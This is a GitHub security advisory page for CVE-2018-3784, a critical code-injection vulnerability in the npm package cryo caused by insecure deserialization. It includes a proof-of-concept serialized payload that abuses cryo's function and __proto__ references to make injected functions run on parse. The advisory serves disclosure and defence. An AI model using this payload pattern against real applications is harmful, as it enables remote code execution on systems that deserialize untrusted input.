Skip to content

Code Injection in cryo

Critical severity GitHub Reviewed Published Aug 21, 2018 to the GitHub Advisory Database • Updated Sep 12, 2023

Package

npm cryo (npm)

Affected versions

<= 0.0.6

Patched versions

None

Description

All versions of cryo are vulnerable to code injection due to an Insecure implementation of deserialization.

Proof of concept

var Cryo = require('cryo');
var frozen = '{"root":"_CRYO_REF_3","references":[{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\\"defconrussia\\"); return 1111;}"},{"contents":{},"value":"_CRYO_FUNCTION_function () {console.log(\\"defconrussia\\");return 2222;}"},{"contents":{"toString":"_CRYO_REF_0","valueOf":"_CRYO_REF_1"},"value":"_CRYO_OBJECT_"},{"contents":{"__proto__":"_CRYO_REF_2"},"value":"_CRYO_OBJECT_"}]}'
var hydrated = Cryo.parse(frozen);
console.log(hydrated);

Recommendation

No fix is currently available. Consider using an alternative module until a fix is made available.

References

Published to the GitHub Advisory Database Aug 21, 2018
Reviewed Jun 16, 2020
Last updated Sep 12, 2023

Severity

Critical
9.8
/ 10

CVSS base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Weaknesses

CVE ID

CVE-2018-3784

GHSA ID

GHSA-38f5-ghc2-fcmv

Source code

No known source code
Checking history
See something to contribute? Suggest improvements for this vulnerability.